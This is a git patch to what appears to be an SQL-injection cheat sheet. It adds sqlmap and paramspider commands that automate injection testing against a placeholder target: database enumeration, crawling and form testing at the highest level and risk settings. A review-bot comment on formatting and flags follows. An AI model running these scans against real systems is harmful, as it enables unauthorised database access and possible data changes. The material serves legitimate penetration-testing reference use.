From ae0bf90e3257644e6390a8e8548607cb91f55d8c Mon Sep 17 00:00:00 2001 From: Mehdi Date: Thu, 13 Jun 2024 12:52:05 +0330 Subject: [PATCH] Update SQL Injection.md --- SQL Injection.md | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/SQL Injection.md b/SQL Injection.md index 5b66faa..99b476a 100644 --- a/SQL Injection.md +++ b/SQL Injection.md @@ -2555,7 +2555,20 @@ AND false False ``` - +## Automate SQLi +```bash +# sqlmap +sqlmap -u target.com/test?id=10 -p id --random-agent --dbs + +# sqlmap is test all forms in target and answered the wizard questios to default +sqlmap -u target.com --forms --batch --crawl=10 --threads=10 --level=5 --risk=3 + +# find all parameters on target and send to sqlmap +python3 paramspider.py -d target.com -s TRUE -e woff,ttf,eot,svg | deduplicate --sort | sed '1,4d' | sqlmap + +# you can use sqlmap + burp --> burp extension sqlipy (integrated by sqlmap) + +```
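Review bot: The comment above the second sqlmap command in the added `## Automate SQLi` block is hard to parse and contains a typo ("questios"); something like `# test every form found while crawling the target; --batch accepts the default answer to each prompt` would read cleanly. That same command sets `--level=5 --risk=3` with no explanation. Risk 3 enables OR-based tests that can change data when the injection point sits in an UPDATE statement, so a one-line comment saying so would help readers pick those values deliberately. In the first command the URL `target.com/test?id=10` is unquoted, which leaves the `?` exposed to shell globbing; wrap the URL in quotes. The last pipeline ends in a bare `sqlmap` with no options, so the snippet does not show how the piped URLs are consumed or how prompts get answered; either show the intended options or write the list to a file and reference it explicitly. The hunk also drops the blank line after the closing fence of the previous block, so the new heading sits directly against it; keep an empty line between the fence and `## Automate SQLi`.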